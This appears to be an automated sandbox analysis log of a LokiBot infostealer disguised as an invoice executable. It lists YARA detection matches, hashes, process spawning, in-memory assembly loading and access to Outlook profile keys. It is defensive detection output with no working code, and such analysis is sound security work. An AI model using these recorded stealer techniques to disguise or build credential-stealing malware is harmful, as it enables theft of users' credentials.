            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.255040267.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6132, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeCode function: 0_2_00FAC1640_2_00FAC164
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeCode function: 0_2_00FAE5B00_2_00FAE5B0
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeCode function: 0_2_00FAE5A00_2_00FAE5A0
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000000.239185933.00000000004A6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemyHA.exeJ vs INV.2022LB0362 FORM CO (2).exe
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.265282526.0000000007150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs INV.2022LB0362 FORM CO (2).exe
            Source: INV.2022LB0362 FORM CO (2).exeBinary or memory string: OriginalFilenamemyHA.exeJ vs INV.2022LB0362 FORM CO (2).exe
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: INV.2022LB0362 FORM CO (2).exeReversingLabs: Detection: 70%
            Source: INV.2022LB0362 FORM CO (2).exeVirustotal: Detection: 56%
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess created: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INV.2022LB0362 FORM CO (2).exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@61/1
            Source: INV.2022LB0362 FORM CO (2).exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6092, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6132, type: MEMORYSTR
            Source: INV.2022LB0362 FORM CO (2).exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.INV.2022LB0362 FORM CO (2).exe.3d0000.0.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: 0xDBD76B81 [Sat Nov 16 23:34:25 2086 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 7.568253289628953
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeProcess information set: NOGPFAULTERRORBOXJump to behavior
